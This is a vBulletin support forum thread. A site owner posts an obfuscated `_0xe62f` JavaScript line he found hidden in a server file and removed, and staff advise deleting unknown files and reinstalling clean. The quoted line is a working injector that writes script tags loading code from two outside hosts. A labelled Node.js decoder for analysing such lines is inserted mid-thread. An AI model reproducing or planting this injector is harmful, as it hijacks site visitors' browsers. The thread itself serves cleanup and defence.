Okay to remove file var _0xe62f from java.cs?

  • David Copeland
    Senior Member
    • May 2000
    • 1354
    • 4.2.5

    [Forum] Okay to remove file var _0xe62f from java.cs?

    On another thread the file var _0xe62f was quoted as a potential culprit in web attacks. In my .cs file for java, I found this same file at the very bottom on Line 558 as if it were placed there to be hidden. I copied and removed it, and the site seems to be working okay. Here is the code:
    PHP Code:
    var _0xe62f=["\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6F\x65\x69\x31\x2E\x67\x71\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x6D\x66\x69\x6F\x2E\x63\x66\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E"];document[_0xe62f[1]](_0xe62f[0]);document[_0xe62f[1]](_0xe62f[2]) 

    DAVID COPELAND
    Licensed VB Holder Since 2000
    Celebrating 22 Years with VB
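
Added example (not part of the original post and not vBulletin code): a Node.js script that reads a `_0x…` string-array line shaped like the one quoted above as text only, never evaluating it, and reports which external script URLs it would write into the page. The sample line, the `_0xabcd` name and the `cdn.example.invalid` host are constructed, and the function names are hypothetical.

```javascript
// Static decoder for "_0x..." string-array obfuscation; nothing is evaluated.

// Decode \xNN and \uNNNN escapes without eval().
function unescapeJs(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}

// Collect every `var _0xNAME=["...", ...]` array with decoded elements.
// Limitation: assumes no literal "]" inside the strings (true when every
// character is hex-escaped, as in the line quoted in the post).
function decodeArrays(src) {
  const arrays = {};
  for (const m of src.matchAll(/var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\]/gi)) {
    arrays[m[1]] = [...m[2].matchAll(/"((?:[^"\\]|\\.)*)"/g)]
      .map(item => unescapeJs(item[1]));
  }
  return arrays;
}

// Resolve calls shaped like obj[_0xNAME[i]](_0xNAME[j]) to plain names.
function resolveCalls(src) {
  const arrays = decodeArrays(src);
  const callRe = /(\w+)\[(_0x[0-9a-f]+)\[(\d+)\]\]\((_0x[0-9a-f]+)\[(\d+)\]\)/gi;
  return [...src.matchAll(callRe)].map(m => ({
    object: m[1],
    method: arrays[m[2]]?.[Number(m[3])],
    arg: arrays[m[4]]?.[Number(m[5])],
  }));
}

// External script URLs that document.write()/writeln() would inject.
function injectedSources(src) {
  return resolveCalls(src)
    .filter(c => c.object === 'document' && /^write(ln)?$/.test(c.method || ''))
    .flatMap(c => [...(c.arg || '').matchAll(/<script[^>]*\ssrc=["']([^"']+)["']/gi)]
      .map(m => m[1]));
}

// Constructed sample with the same shape as the quoted line; the host is a
// placeholder, hex-encoded here so the escapes are exact.
const hex = s => [...s].map(c =>
  '\\x' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
const SAMPLE = 'var _0xabcd=["' +
  hex('<script type="text/javascript" src="//cdn.example.invalid"></script>') +
  '","' + hex('write') + '"];document[_0xabcd[1]](_0xabcd[0]);';
console.log(resolveCalls(SAMPLE), injectedSources(SAMPLE));
```

To check a real file, pass its contents (read as a string) to `injectedSources` in place of `SAMPLE`.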
  • Wayne Luke
    vBulletin Technical Support Lead
    • Aug 2000
    • 73981

    #2
    vBulletin doesn't use Java. It does use JavaScript. These are two completely different languages without relationship to each other despite the poor choice of names.

    vBulletin does not have any files with the .cs extension. If you don't know what this file does, then you should delete it. You shouldn't allow files on your server that you don't know what they do.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API


    • David Copeland
      Senior Member
      • May 2000
      • 1354
      • 4.2.5

      #3
      Originally posted by Wayne Luke
      vBulletin doesn't use Java. It does use JavaScript. These are two completely different languages without relationship to each other despite the poor choice of names.

      vBulletin does not have any files with the .cs extension. If you don't know what this file does, then you should delete it. You shouldn't allow files on your server that you don't know what they do.
      To better determine what the code related to, I did a Google search and the first hit was:

      Hello! Since yesterday, whenever I try to login on my forums (when I click on the username field) I get a popup ad, which I did not insert myself. It happens not


      Another site that offers various VB support also had the same code listed on one of their threads. The actual code may not be a VB file, but it appears there may be backdoor shells in place.

      After spending 4 hours going through server and cPanel files, I was able to stop the intrusiveness. Our server access is turned off to anyone who is not using our dedicated IP address. But I will be looking for some more tips (backdoor preventives) to help make this nightmare see a glimmer of hope.


      DAVID COPELAND
      Licensed VB Holder Since 2000
      Celebrating 22 Years with VB


      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 73981

        #4
        If you're not currently using vBulletin 4.2.5 with a fresh set of files then you'll have problems. Patches do not remove exploits from your site. If you patched to 4.2.2 PL4 back in 2013, or so, and didn't remove any backdoor exploit, it would have remained until today. You have to remove these manually. We have an entire topic on this stickied in this forum.

        https://www.vbulletin.com/forum/foru...ring-your-site

        Here is what I would do...

        1) Log into the AdminCP and disable all third-party products.
        2) Rename my vBulletin directory to something else.
        3) Create a new directory to hold vBulletin.
        4) Upload new files from a fresh download of vBulletin 4.2.5.
        5) Use these files to run your forum.

        Other options would be upgrading to vBulletin 5.5.0 or vBulletin Cloud.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API
